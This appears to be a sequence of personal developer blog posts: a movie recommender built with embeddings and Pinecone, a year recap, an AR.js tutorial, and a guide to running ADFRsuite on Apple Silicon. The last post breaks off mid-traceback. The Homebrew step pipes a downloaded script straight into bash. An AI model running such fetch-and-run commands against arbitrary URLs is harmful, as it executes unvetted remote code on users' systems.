        "votes": int(m["votes"]),
        "comment_count": int(m["comment_count"]),
        "tagline": m["tagline"]
    }
    return movie_dict
# Get total number of items
params["limit"] = 1
res = requests.get(f"{api_base}/search/movie",headers=headers,params=params)
total_items = res.headers["x-pagination-item-count"]
engine, Session = init_db_stuff(database_url)
for page in tqdm(range(1, max_requests+1)):
    params["page"] = page
    params["limit"] = int(int(total_items)/max_requests)
    movies = []
    res = requests.get(f"{api_base}/search/movie", headers=headers, params=params)
    if res.status_code == 500:
        break
    elif res.status_code == 200:
        pass
    else:
        print(f"OwO Code {res.status_code}")
    for movie in res.json():
        movies.append(create_movie_dict(movie))
    with engine.connect() as conn:
        for movie in movies:
            with conn.begin() as trans:
                stmt = insert(movies_table).values(
                    trakt_id=movie["trakt_id"], title=movie["title"], genres=" ".join(movie["genres"]),
                    language=movie["language"], year=movie["year"], released=movie["released"],
                    runtime=movie["runtime"], country=movie["country"], overview=movie["overview"],
                    rating=movie["rating"], votes=movie["votes"], comment_count=movie["comment_count"],
                    tagline=movie["tagline"])
                try:
                    result = conn.execute(stmt)
                    trans.commit()
                except IntegrityError:
                    trans.rollback()
    req_count += 1
(Note: I was well within the rate-limit so I did not have to slow down or implement any other measures)
Running this script took me approximately 3 hours, and resulted in an SQLite database of 141.5 MB
I did not want to put my poor Mac through the estimated 23 hours it would have taken to embed the sentences. I decided to use Google Colab instead.
Because of the small size of the database file, I was able to just upload the file.
For the encoding model, I decided to use the pretrained paraphrase-multilingual-MiniLM-L12-v2
model for SentenceTransformers, a Python framework for SOTA sentence, text and image embeddings.
I wanted to use a multilingual model as I personally consume content in various languages and some of the sources for their information do not translate to English.
As of writing this post, I did not include any other database except Trakt.
While deciding how I was going to process the embeddings, I came across multiple solutions:
Milvus - An open-source vector database with similar search functionality
FAISS - A library for efficient similarity search
Pinecone - A fully managed vector database with similar search functionality
I did not want to waste time setting up the first two, so I decided to go with Pinecone which offers 1M 768-dim vectors for free with no credit card required (Our embeddings are 384-dim dense).
Getting started with Pinecone was as easy as:
Signing up
Specifying the index name and vector dimensions along with the similarity search metric (Cosine Similarity for our use case)
Getting the API key
Installing the Python module (pinecone-client)
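Step 2 (creating the index) might look something like this with the pinecone-client version used here (a sketch; the API key and environment are placeholders):
import pinecone

pinecone.init(api_key="your-api-key", environment="us-west1-gcp")
pinecone.create_index("movies", dimension=384, metric="cosine")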
import pandas as pd
import pinecone
from sentence_transformers import SentenceTransformer
from tqdm import tqdm

from database import init_db_stuff  # the schema helper defined earlier
database_url = "sqlite:///jlm.db"
PINECONE_KEY = "not-this-at-all"
batch_size = 32
pinecone.init(api_key=PINECONE_KEY, environment="us-west1-gcp")
index = pinecone.Index("movies")
model = SentenceTransformer("paraphrase-multilingual-MiniLM-L12-v2", device="cuda")
engine, Session = init_db_stuff(database_url)
df = pd.read_sql("Select * from movies", engine)
df["combined_text"] = df["title"] + ": " + df["overview"].fillna('') + " - " + df["tagline"].fillna('') + " Genres:- " + df["genres"].fillna('')
# Creating the embedding and inserting it into the database
for x in tqdm(range(0, len(df), batch_size)):
    to_send = []
    trakt_ids = df["trakt_id"][x:x+batch_size].tolist()
    sentences = df["combined_text"][x:x+batch_size].tolist()
    embeddings = model.encode(sentences)
    for idx, value in enumerate(trakt_ids):
        to_send.append(
            (
                str(value), embeddings[idx].tolist()
            ))
    index.upsert(to_send)
That's it! We use the trakt_id of the movie as the ID for the vector and upsert it into the index.
To find similar items, we will first have to map the name of the movie to its trakt_id, get the embedding we have for that ID, and then perform a similarity search. This additional mapping step could probably be avoided by storing the information as metadata in the index.
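For instance, the upsert could have attached metadata like this (a sketch reusing the index handle from above; the values are illustrative):
example_vector = [0.0] * 384  # stand-in for a real 384-dim embedding
index.upsert([
    ("55786", example_vector, {"title": "Now You See Me", "year": 2013})
])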
def get_trakt_id(df, title: str):
    rec = df[df["title"].str.lower() == title.lower()]
    if len(rec.trakt_id.values.tolist()) > 1:
        print(f"multiple values found... {len(rec.trakt_id.values)}")
        for x in range(len(rec)):
            print(f"[{x}] {rec['title'].tolist()[x]} ({rec['year'].tolist()[x]}) - {rec['overview'].tolist()[x]}")
            print("===")
        z = int(input("Choose No: "))
        return rec.trakt_id.values[z]
    return rec.trakt_id.values[0]

def get_vector_value(trakt_id: int):
    fetch_response = index.fetch(ids=[str(trakt_id)])
    return fetch_response["vectors"][str(trakt_id)]["values"]

def query_vectors(vector: list, top_k: int = 20, include_values: bool = False, include_metadata: bool = True):
    query_response = index.query(
        queries=[
            (vector),
        ],
        top_k=top_k,
        include_values=include_values,
        include_metadata=include_metadata
    )
    return query_response

def query2ids(query_response):
    trakt_ids = []
    for match in query_response["results"][0]["matches"]:
        trakt_ids.append(int(match["id"]))
    return trakt_ids

def get_deets_by_trakt_id(df, trakt_id: int):
    df = df[df["trakt_id"] == trakt_id]
    return {
        "title": df.title.values[0],
        "overview": df.overview.values[0],
        "runtime": df.runtime.values[0],
        "year": df.year.values[0]
    }
movie_name = "Now You See Me"
movie_trakt_id = get_trakt_id(df, movie_name)
print(movie_trakt_id)
movie_vector = get_vector_value(movie_trakt_id)
movie_queries = query_vectors(movie_vector)
movie_ids = query2ids(movie_queries)
print(movie_ids)
for trakt_id in movie_ids:
    deets = get_deets_by_trakt_id(df, trakt_id)
    print(f"{deets['title']} ({deets['year']}): {deets['overview']}")
Output:
55786
[55786, 18374, 299592, 662622, 6054, 227458, 139687, 303950, 70000, 129307, 70823, 5766, 23950, 137696, 655723, 32842, 413269, 145994, 197990, 373832]
Now You See Me (2013): An FBI agent and an Interpol detective track a team of illusionists who pull off bank heists during their performances and reward their audiences with the money.
Trapped (1949): U.S. Treasury Department agents go after a ring of counterfeiters.
Brute Sanity (2018): An FBI-trained neuropsychologist teams up with a thief to find a reality-altering device while her insane ex-boss unleashes bizarre traps to stop her.
The Chase (2017): Some FBI agents hunt down a criminal
Surveillance (2008): An FBI agent tracks a serial killer with the help of three of his would-be victims - all of whom have wildly different stories to tell.
Marauders (2016): An untraceable group of elite bank robbers is chased by a suicidal FBI agent who uncovers a deeper purpose behind the robbery-homicides.
Miracles for Sale (1939): A maker of illusions for magicians protects an ingenue likely to be murdered.
Deceptors (2005): A Ghostbusters knock-off where a group of con-artists create bogus monsters to scare up some cash. They run for their lives when real spooks attack.
The Outfit (1993): A renegade FBI agent sparks an explosive mob war between gangster crime lords Legs Diamond and Dutch Schultz.
Bank Alarm (1937): A federal agent learns the gangsters he's been investigating have kidnapped his sister.
The Courier (2012): A shady FBI agent recruits a courier to deliver a mysterious package to a vengeful master criminal who has recently resurfaced with a diabolical plan.
After the Sunset (2004): An FBI agent is suspicious of two master thieves, quietly enjoying their retirement near what may - or may not - be the biggest score of their careers.
Down Three Dark Streets (1954): An FBI Agent takes on the three unrelated cases of a dead agent to track down his killer.
The Executioner (1970): A British intelligence agent must track down a fellow spy suspected of being a double agent.
Ace of Cactus Range (1924): A Secret Service agent goes undercover to unmask the leader of a gang of diamond thieves.
Firepower (1979): A mercenary is hired by the FBI to track down a powerful recluse criminal, a woman is also trying to track him down for her own personal vendetta.
Heroes & Villains (2018): an FBI agent chases a thug to great tunes
Federal Fugitives (1941): A government agent goes undercover in order to apprehend a saboteur who caused a plane crash.
Hell on Earth (2012): An FBI Agent on the trail of a group of drug traffickers learns that their corruption runs deeper than she ever imagined, and finds herself in a supernatural - and deadly - situation.
Spies (2015): A secret agent must perform a heist without time on his side
For now, I am happy with the recommendations.
I quickly whipped up a simple Flask app to deal with multiple movies sharing the same title, and with typos in the search query. It also includes additional filter options.
The code for the Flask app can be found on GitHub (navanchauhan/FlixRec) or on my Gitea instance.
Test it out at https://flixrec.navan.dev
2024 % 4 == 0
Another revolution around the sun! This was a pretty fun and interesting year. I got to work on some interesting projects, and learned a lot.
I am going to try and use my GitHub activity to recap.
Summer was more relaxing. I mainly worked on some maintenance patches for my projects, and did some more freelancing stuff.
After the end of the fall semester I ended up getting my wisdom tooth removed. Took me out for 10 days.
I also did a ton of other stuff, but I am not sure how much I want to be sharing on my blog here. Maybe as I write more I will get more comfortable with sharing more information.
So, what are my plans for 2024? Learn. Build. Ship.
Other goals:
AR.js is a lightweight library for Augmented Reality on the Web, coming with features like Image Tracking, Location based AR and Marker tracking. It is the easiest option for cross-browser augmented reality.
The same code works for iOS, Android, Desktops and even VR Browsers!
It was initially created by Jerome Etienne and is now maintained by Nicolo Carpignoli and the AR-js Organisation
Usually for augmented reality you need specialised markers, like this Hiro marker (notice the thick non-aesthetic borders 🤢)
This is called marker-based tracking, where the code knows what to look for. NFT, or Natural Feature Tracking, converts normal images into markers by extracting 'features' from them; this way you can use any image of your liking!
I'll be using my GitHub profile picture
First we need to create the marker files required by AR.js for NFT. For this we use Carnaux's repository 'NFT-Marker-Creator'.
$ git clone https://github.com/Carnaux/NFT-Marker-Creator
Cloning into 'NFT-Marker-Creator'...
remote: Enumerating objects: 79, done.
remote: Counting objects: 100% (79/79), done.
remote: Compressing objects: 100% (72/72), done.
remote: Total 580 (delta 10), reused 59 (delta 7), pack-reused 501
Receiving objects: 100% (580/580), 9.88 MiB | 282.00 KiB/s, done.
Resolving deltas: 100% (262/262), done.
$ cd NFT-Marker-Creator
$ npm install
npm WARN nodegenerator@1.0.0 No repository field.
added 67 packages from 56 contributors and audited 67 packages in 2.96s
1 package is looking for funding
run `npm fund` for details
found 0 vulnerabilities
╭────────────────────────────────────────────────────────────────╮
│ │
│ New patch version of npm available! 6.14.5 → 6.14.7 │
│ Changelog: https://github.com/npm/cli/releases/tag/v6.14.7 │
│ Run npm install -g npm to update! │
│ │
╰────────────────────────────────────────────────────────────────╯
$ cp ~/CodingAndStuff/ARjs/me.png .
$ node app.js -i me.png
Confidence level: [ * * * * * ] 5/5 || Entropy: 5.24 || Current max: 5.17 min: 4.6
Do you want to continue? (Y/N)
y
writeStringToMemory is deprecated and should not be called! Use stringToUTF8() instead!
[info]
Commands:
[info] --
Generator started at 2020-08-01 16:01:41 +0580
[info] Tracking Extraction Level = 2
[info] MAX_THRESH = 0.900000
[info] MIN_THRESH = 0.550000
[info] SD_THRESH = 8.000000
[info] Initialization Extraction Level = 1
[info] SURF_FEATURE = 100
[info] min allow 3.699000.
[info] Image DPI (1): 3.699000
[info] Image DPI (2): 4.660448
[info] Image DPI (3): 5.871797
[info] Image DPI (4): 7.398000
[info] Image DPI (5): 9.320896
[info] Image DPI (6): 11.743593
[info] Image DPI (7): 14.796000
[info] Image DPI (8): 18.641792
[info] Image DPI (9): 23.487186
[info] Image DPI (10): 29.592001
[info] Image DPI (11): 37.283585
[info] Image DPI (12): 46.974373
[info] Image DPI (13): 59.184002
[info] Image DPI (14): 72.000000
[info] Generating ImageSet...
[info] (Source image xsize=568, ysize=545, channels=3, dpi=72.0).
[info] Done.
[info] Saving to asa.iset...
[info] Done.
[info] Generating FeatureList...
...
[info] (46, 44) 5.871797[dpi]
[info] Freak features - 23[info] ========= 23 ===========
[info] (37, 35) 4.660448[dpi]
[info] Freak features - 19[info] ========= 19 ===========
[info] (29, 28) 3.699000[dpi]
[info] Freak features - 9[info] ========= 9 ===========
[info] Done.
[info] Saving FeatureSet3...
[info] Done.
[info] Generator finished at 2020-08-01 16:02:02 +0580
--
Finished marker creation!
Now configuring demo!
Finished!
To run demo use: 'npm run demo'
Now we have the required files in the output folder
$ ls output
me.fset me.fset3 me.iset
Create a new file called index.html in your project folder. This is the basic template we are going to use. Replace me with the root filename of your image; for example, NeverGonnaGiveYouUp.png will become NeverGonnaGiveYouUp. Make sure you have copied all three files from the output folder in the previous step to the root of your project folder.
<script src="https://cdn.jsdelivr.net/gh/aframevr/aframe@1c2407b26c61958baa93967b5412487cd94b290b/dist/aframe-master.min.js"></script>
<script src="https://raw.githack.com/AR-js-org/AR.js/master/aframe/build/aframe-ar-nft.js"></script>
<style>
  .arjs-loader {
    height: 100%;
    width: 100%;
    position: absolute;
    top: 0;
    left: 0;
    background-color: rgba(0, 0, 0, 0.8);
    z-index: 9999;
    display: flex;
    justify-content: center;
    align-items: center;
  }

  .arjs-loader div {
    text-align: center;
    font-size: 1.25em;
    color: white;
  }
</style>
<body style="margin : 0px; overflow: hidden;">
<div class="arjs-loader">
<div>Calculating Image Descriptors....</div>
</div>
<a-scene
vr-mode-ui="enabled: false;"
renderer="logarithmicDepthBuffer: true;"
embedded
arjs="trackingMethod: best; sourceType: webcam;debugUIEnabled: false;"
>
<a-nft
type="nft"
url="./me"
smooth="true"
smoothCount="10"
smoothTolerance=".01"
smoothThreshold="5"
>
</a-nft>
<a-entity camera></a-entity>
</a-scene>
</body>
In this, we are creating an A-Frame scene and telling it that we want to use NFT tracking. The amazing part about using A-Frame is that we can use all the usual A-Frame objects!
Let us add a simple box!
<a-nft .....>
<a-box position='100 0.5 -180' material='opacity: 0.5; side: double' scale="100 100 100"></a-box>
</a-nft>
Now, to test it out, we will need to run a simple server; I use Python's inbuilt SimpleHTTPServer alongside ngrok. At this point your project folder should have 4 files: index.html, me.fset, me.fset3, and me.iset. Open up two terminal windows and cd into your project folder, then run the following commands to start up your server.
In the first terminal window start the Python Server
$ cd ~/CodingAndStuff/ARjs
$ python2 -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
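(On Python 3, the equivalent one-liner would be python3 -m http.server.)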
In the other window run ngrok
( Make sure you have installed it prior to running this step )
$ ngrok http 8000
Now copy the ngrok URL to your phone and try running the example.
👏 Congratulations! You just built an Augmented Reality experience using AR.js and AFrame
Edit your index.html:
<a-nft ..>
  <a-box ..>
    <a-torus-knot radius='0.26' radius-tubular='0.05'></a-torus-knot>
  </a-box>
</a-nft>
Now that we know how to place a box in the scene and add a torus knot in it, what do we do next? We bring the classic internet back!
AFrame GIF Shader is a GIF shader for A-Frame created by mayognaise.
Add <script src="https://rawgit.com/mayognaise/aframe-gif-shader/master/dist/aframe-gif-shader.min.js"></script>
to <head>
Change the box's material to add the GIF shader
...
<a-box position='100 0.5 -180' material="shader:gif;src:url(https://media.tenor.com/images/412b1aa9149d98d561df62db221e0789/tenor.gif);opacity:.5" .....>
Here is a screenshot of me scanning a rounded version of my profile picture. (It still works, even though the image is cropped and I haven't changed a single line of code!)
We are going to be running everything through Rosetta 2. I am confident that if I had access to the original source code, I could find a way to run everything natively.
These are the issues that we will be fixing in this part:
For the sake of simplicity, I am assuming that I am running all these commands in the folder ~/Developer/scrippstuff/
We are going to run all of these steps in the terminal
/usr/sbin/softwareupdate --install-rosetta --agree-to-license
Both versions of Homebrew (x86 and arm64) can peacefully coexist on your system: the x86 version installs under /usr/local, while the arm64 version lives in /opt/homebrew.
From now on, every command should be run in a terminal session that starts with this as the first command:
arch -x86_64 zsh
Now, we can install homebrew:
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
Here is my output:
➜ scrippstuff uname -a
Darwin Navans-MacBook-Pro.local 23.3.0 Darwin Kernel Version 23.3.0: Wed Dec 20 21:31:00 PST 2023; root:xnu-10002.81.5~7/RELEASE_ARM64_T6020 x86_64
➜ scrippstuff /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
==> Checking for `sudo` access (which may request your password)...
Password:
==> This script will install:
/usr/local/bin/brew
/usr/local/share/doc/homebrew
/usr/local/share/man/man1/brew.1
/usr/local/share/zsh/site-functions/_brew
/usr/local/etc/bash_completion.d/brew
/usr/local/Homebrew
==> The following new directories will be created:
/usr/local/Cellar
/usr/local/Caskroom
Press RETURN/ENTER to continue or any other key to abort:
==> /usr/bin/sudo /bin/mkdir -p /usr/local/Cellar /usr/local/Caskroom
==> /usr/bin/sudo /bin/chmod ug=rwx /usr/local/Cellar /usr/local/Caskroom
==> /usr/bin/sudo /usr/sbin/chown navanchauhan /usr/local/Cellar /usr/local/Caskroom
==> /usr/bin/sudo /usr/bin/chgrp admin /usr/local/Cellar /usr/local/Caskroom
==> /usr/bin/sudo /usr/sbin/chown -R navanchauhan:admin /usr/local/Homebrew
==> /usr/bin/sudo /bin/mkdir -p /Users/navanchauhan/Library/Caches/Homebrew
==> /usr/bin/sudo /bin/chmod g+rwx /Users/navanchauhan/Library/Caches/Homebrew
==> /usr/bin/sudo /usr/sbin/chown -R navanchauhan /Users/navanchauhan/Library/Caches/Homebrew
==> Downloading and installing Homebrew...
remote: Enumerating objects: 47, done.
remote: Counting objects: 100% (47/47), done.
remote: Compressing objects: 100% (19/19), done.
remote: Total 47 (delta 28), reused 47 (delta 28), pack-reused 0
Unpacking objects: 100% (47/47), 6.11 KiB | 223.00 KiB/s, done.
From https://github.com/Homebrew/brew
+ 18ebdd8c8f...67a096fcbb tapioca-compiler-for-tty-rbi -> origin/tapioca-compiler-for-tty-rbi (forced update)
Switched to and reset branch 'stable'
==> Updating Homebrew...
==> Installation successful!
==> Homebrew has enabled anonymous aggregate formulae and cask analytics.
Read the analytics documentation (and how to opt-out) here:
https://docs.brew.sh/Analytics
No analytics data has been sent yet (nor will any be during this install run).
==> Homebrew is run entirely by unpaid volunteers. Please consider donating:
https://github.com/Homebrew/brew#donations
==> Next steps:
- Run these two commands in your terminal to add Homebrew to your PATH:
(echo; echo 'eval "$(/usr/local/bin/brew shellenv)"') >> /Users/navanchauhan/.zprofile
eval "$(/usr/local/bin/brew shellenv)"
- Run brew help to get started
- Further documentation:
https://docs.brew.sh
At this point, you don't need to edit your zshrc or zsh_profile.
The reason we are installing pyenv is that it is easier to build Python 2.7.18 from scratch than to mess around with codesigning and quarantine nonsense on macOS.
➜ scrippstuff brew install pyenv
==> Downloading https://ghcr.io/v2/homebrew/core/pyenv/manifests/2.3.36
############################################################################################################################################################### 100.0%
==> Fetching dependencies for pyenv: m4, autoconf, ca-certificates, openssl@3, pkg-config and readline
==> Downloading https://ghcr.io/v2/homebrew/core/m4/manifests/1.4.19
############################################################################################################################################################### 100.0%
==> Fetching m4
==> Downloading https://ghcr.io/v2/homebrew/core/m4/blobs/sha256:8434a67a4383836b2531a6180e068640c5b482ee6781b673d65712e4fc86ca76
############################################################################################################################################################### 100.0%
==> Downloading https://ghcr.io/v2/homebrew/core/autoconf/manifests/2.72
############################################################################################################################################################### 100.0%
==> Fetching autoconf
==> Downloading https://ghcr.io/v2/homebrew/core/autoconf/blobs/sha256:12368e33b89d221550ba9e261b0c6ece0b0e89250fb4c95169d09081e0ebb2dd
############################################################################################################################################################### 100.0%
==> Downloading https://ghcr.io/v2/homebrew/core/ca-certificates/manifests/2024-03-11
############################################################################################################################################################### 100.0%
==> Fetching ca-certificates
==> Downloading https://ghcr.io/v2/homebrew/core/ca-certificates/blobs/sha256:cab828953672906e00a8f25db751977b8dc4115f021f8dfe82b644ade03dacdb
############################################################################################################################################################### 100.0%
==> Downloading https://ghcr.io/v2/homebrew/core/openssl/3/manifests/3.2.1-1
############################################################################################################################################################### 100.0%
==> Fetching openssl@3
==> Downloading https://ghcr.io/v2/homebrew/core/openssl/3/blobs/sha256:ef8211c5115fc85f01261037f8fea76cc432b92b4fb23bc87bbf41e9198fcc0f
############################################################################################################################################################### 100.0%
==> Downloading https://ghcr.io/v2/homebrew/core/pkg-config/manifests/0.29.2_3
############################################################################################################################################################### 100.0%
==> Fetching pkg-config
==> Downloading https://ghcr.io/v2/homebrew/core/pkg-config/blobs/sha256:421571f340277c62c5cc6fd68737bd7c4e085de113452ea49b33bcd46509bb12
############################################################################################################################################################### 100.0%
==> Downloading https://ghcr.io/v2/homebrew/core/readline/manifests/8.2.10
############################################################################################################################################################### 100.0%
==> Fetching readline
==> Downloading https://ghcr.io/v2/homebrew/core/readline/blobs/sha256:9796e0ff1cc29ae7e75d8fc1a3e2c5e8ae2aeade8d9d59a16363306bf6c5b8f4
############################################################################################################################################################### 100.0%
==> Fetching pyenv
==> Downloading https://ghcr.io/v2/homebrew/core/pyenv/blobs/sha256:d117a99ed53502aff29109bfa366693ca623f2326e1e6b4db68fef7b7f63eeba
############################################################################################################################################################### 100.0%
==> Installing dependencies for pyenv: m4, autoconf, ca-certificates, openssl@3, pkg-config and readline
==> Installing pyenv dependency: m4
==> Downloading https://ghcr.io/v2/homebrew/core/m4/manifests/1.4.19
Already downloaded: /Users/navanchauhan/Library/Caches/Homebrew/downloads/5b2a7f715487b7377e409e8ca58569040cd89f33859f691210c58d94410fd33b--m4-1.4.19.bottle_manifest.json
==> Pouring m4--1.4.19.sonoma.bottle.tar.gz
🍺 /usr/local/Cellar/m4/1.4.19: 13 files, 739.9KB
==> Installing pyenv dependency: autoconf
==> Downloading https://ghcr.io/v2/homebrew/core/autoconf/manifests/2.72
Already downloaded: /Users/navanchauhan/Library/Caches/Homebrew/downloads/b73cdb320c4261bbf8d02d03e50dc755c869c5859c1d4e93616898fc7cd939ff--autoconf-2.72.bottle_manifest.json
==> Pouring autoconf--2.72.sonoma.bottle.tar.gz
🍺 /usr/local/Cellar/autoconf/2.72: 71 files, 3.6MB
==> Installing pyenv dependency: ca-certificates
==> Downloading https://ghcr.io/v2/homebrew/core/ca-certificates/manifests/2024-03-11
Already downloaded: /Users/navanchauhan/Library/Caches/Homebrew/downloads/c431e0186df2ccc2ea942b34a3c26c2cebebec8e07ad6abdae48447a52c5f506--ca-certificates-2024-03-11.bottle_manifest.json
==> Pouring ca-certificates--2024-03-11.all.bottle.tar.gz
==> Regenerating CA certificate bundle from keychain, this may take a while...
🍺 /usr/local/Cellar/ca-certificates/2024-03-11: 3 files, 229.6KB
==> Installing pyenv dependency: openssl@3
==> Downloading https://ghcr.io/v2/homebrew/core/openssl/3/manifests/3.2.1-1
Already downloaded: /Users/navanchauhan/Library/Caches/Homebrew/downloads/f7b6e249843882452d784a8cbc4e19231186230b9e485a2a284d5c1952a95ec2--openssl@3-3.2.1-1.bottle_manifest.json
==> Pouring openssl@3--3.2.1.sonoma.bottle.1.tar.gz
🍺 /usr/local/Cellar/openssl@3/3.2.1: 6,874 files, 32.5MB
==> Installing pyenv dependency: pkg-config
==> Downloading https://ghcr.io/v2/homebrew/core/pkg-config/manifests/0.29.2_3
Already downloaded: /Users/navanchauhan/Library/Caches/Homebrew/downloads/ac691fc7ab8ecffba32a837e7197101d271474a3a84cfddcc30c9fd6763ab3c6--pkg-config-0.29.2_3.bottle_manifest.json
==> Pouring pkg-config--0.29.2_3.sonoma.bottle.tar.gz
🍺 /usr/local/Cellar/pkg-config/0.29.2_3: 11 files, 656.4KB
==> Installing pyenv dependency: readline
==> Downloading https://ghcr.io/v2/homebrew/core/readline/manifests/8.2.10
Already downloaded: /Users/navanchauhan/Library/Caches/Homebrew/downloads/4ddd52803319828799f1932d4c7fa8d11c667049b20a56341c0c19246a1be93b--readline-8.2.10.bottle_manifest.json
==> Pouring readline--8.2.10.sonoma.bottle.tar.gz
🍺 /usr/local/Cellar/readline/8.2.10: 50 files, 1.7MB
==> Installing pyenv
==> Pouring pyenv--2.3.36.sonoma.bottle.tar.gz
🍺 /usr/local/Cellar/pyenv/2.3.36: 1,158 files, 3.4MB
==> Running `brew cleanup pyenv`...
Disable this behaviour by setting HOMEBREW_NO_INSTALL_CLEANUP.
Hide these hints with HOMEBREW_NO_ENV_HINTS (see `man brew`).
Next, build the final release of Python 2.7:
➜ scrippstuff PYENV_ROOT="~/Developer/scrippstuff" pyenv install 2.7.18
python-build: use openssl from homebrew
python-build: use readline from homebrew
Downloading Python-2.7.18.tar.xz...
-> https://www.python.org/ftp/python/2.7.18/Python-2.7.18.tar.xz
Installing Python-2.7.18...
patching file configure
patching file configure.ac
patching file setup.py
patching file 'Mac/Tools/pythonw.c'
patching file setup.py
patching file 'Doc/library/ctypes.rst'
patching file 'Lib/test/test_str.py'
patching file 'Lib/test/test_unicode.py'
patching file 'Modules/_ctypes/_ctypes.c'
patching file 'Modules/_ctypes/callproc.c'
patching file 'Modules/_ctypes/ctypes.h'
patching file 'Modules/_ctypes/callproc.c'
patching file setup.py
patching file 'Mac/Modules/qt/setup.py'
patching file setup.py
python-build: use readline from homebrew
python-build: use zlib from xcode sdk
Installed Python-2.7.18 to /Users/navanchauhan/Developer/scrippstuff/~/Developer/scrippstuff/versions/2.7.18
Note that because PYENV_ROOT was quoted, the tilde was not expanded by the shell, which is why the version ends up under a literal ~ directory inside the project folder. Test the new installation:
➜ scrippstuff ~/Developer/scrippstuff/\~/Developer/scrippstuff/versions/2.7.18/bin/python2.7
Python 2.7.18 (default, Mar 28 2024, 20:47:13)
[GCC Apple LLVM 15.0.0 (clang-1500.1.0.2.5)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> from random import randint
>>> randint(0,10)
6
>>> exit()
Now, we can compress this newly created Python version into a tar.gz file to replace the one provided in ADFRsuite_x86_64Darwin_1.0.tar.gz. Don't forget the . at the end:
➜ scrippstuff tar -C ./\~/Developer/scrippstuff/versions/2.7.18 -czf new.tar.gz .
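To sanity-check the new archive before swapping it in (optional), you can list its contents:
$ tar -tzf new.tar.gz | head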
If you don't already have the tarball, you can download it with:
$ curl -o adfr.tar.gz https://ccsb.scripps.edu/adfr/download/1033/
Uncompress it
$ tar -xvzf adfr.tar.gz
Replace the provided Python archive with the one we created:
$ cd ADFRsuite_x86_64Darwin_1.0
$ mv new.tar.gz Python2.7.tar.gz
Note: For some reason simply copying it doesn't work; you need to use mv.
Just to not mess with anything else, I will be installing everything in a folder called clean_install
$ mkdir clean_install
$ ./install.sh -d clean_install
...
ADFRsuite installation complete.
To run agfr, agfrgui, adfr, autosite, about, pythonsh scripts located at:
/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/bin
add /Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/bin to the path environment variable in .cshrc or .bashrc:
.cshrc:
set path = (/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/bin $path)
.bashrc:
export PATH=/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/bin:$PATH
Now, to test agfr, first run the following command (replacing navanchauhan with your username):
$ export PATH=/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/bin:$PATH
$ agfr
➜ ADFRsuite_x86_64Darwin_1.0 agfr
==============================
*** Open Babel Error in openLib
/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/lib/openbabel/2.4.1/acesformat.so did not load properly.
Error: dlopen(/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/lib/openbabel/2.4.1/acesformat.so, 0x0009): Library not loaded: /opt/X11/lib/libcairo.2.dylib
Referenced from: <24174F3E-2670-79AC-4F26-F8B49774194A> /Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/lib/openbabel/2.4.1/acesformat.so
Reason: tried: '/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/lib/libcairo.2.dylib' (no such file), '/opt/X11/lib/libcairo.2.dylib' (no such file), '/System/Volumes/Preboot/Cryptexes/OS/opt/X11/lib/libcairo.2.dylib' (no such file), '/opt/X11/lib/libcairo.2.dylib' (no such file), '/usr/local/lib/libcairo.2.dylib' (no such file), '/usr/lib/libcairo.2.dylib' (no such file, not in dyld cache)
==============================
Open Babel Error
The missing library here is libcairo; installing cairo through Homebrew fixes it:
$ brew install cairo
Next, grab the ADCP tutorial data and try generating a target:
$ curl -o tutorial-data.zip https://ccsb.scripps.edu/adcp/download/1063/
$ unzip tutorial-data.zip
$ cd ADCP_tutorial_data/3Q47
$ reduce 3Q47_rec.pdb > 3Q47_recH.pdb
$ reduce 3Q47_pep.pdb > 3Q47_pepH.pdb
$ prepare_receptor -r 3Q47_recH.pdb
$ prepare_ligand -l 3Q47_pepH.pdb
$ agfr -r 3Q47_recH.pdbqt -l 3Q47_pepH.pdbqt -asv 1.1 -o 3Q47
➜ 3Q47 agfr -r 3Q47_recH.pdbqt -l 3Q47_pepH.pdbqt -asv 1.1 -o 3Q47
Traceback (most recent call last):
File "/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/CCSBpckgs/ADFR/bin/runAGFR.py", line 36, in <module>
from ADFR.utils.runAGFR import runAGFR
File "/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/CCSBpckgs/ADFR/utils/runAGFR.py", line 41, in <module>
from ADFR.utils.maps import flexResStr2flexRes
File "/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/CCSBpckgs/ADFR/utils/maps.py", line 35, in <module>
from ADFRcc.adfr import GridMap
File "/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/CCSBpckgs/ADFRcc/__init__.py", line 34, in <module>
from ADFRcc.adfr import Parameters
File "/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/CCSBpckgs/ADFRcc/adfr.py", line 43, in <module>
import ADFRcc.adfrcc as CPP
File "/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/CCSBpckgs/ADFRcc/adfrcc.py", line 28, in <module>
_adfrcc = swig_import_helper()
File "/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/CCSBpckgs/ADFRcc/adfrcc.py", line 24, in swig_import_helper
_mod = imp.load_module('_adfrcc', fp, pathname, description)
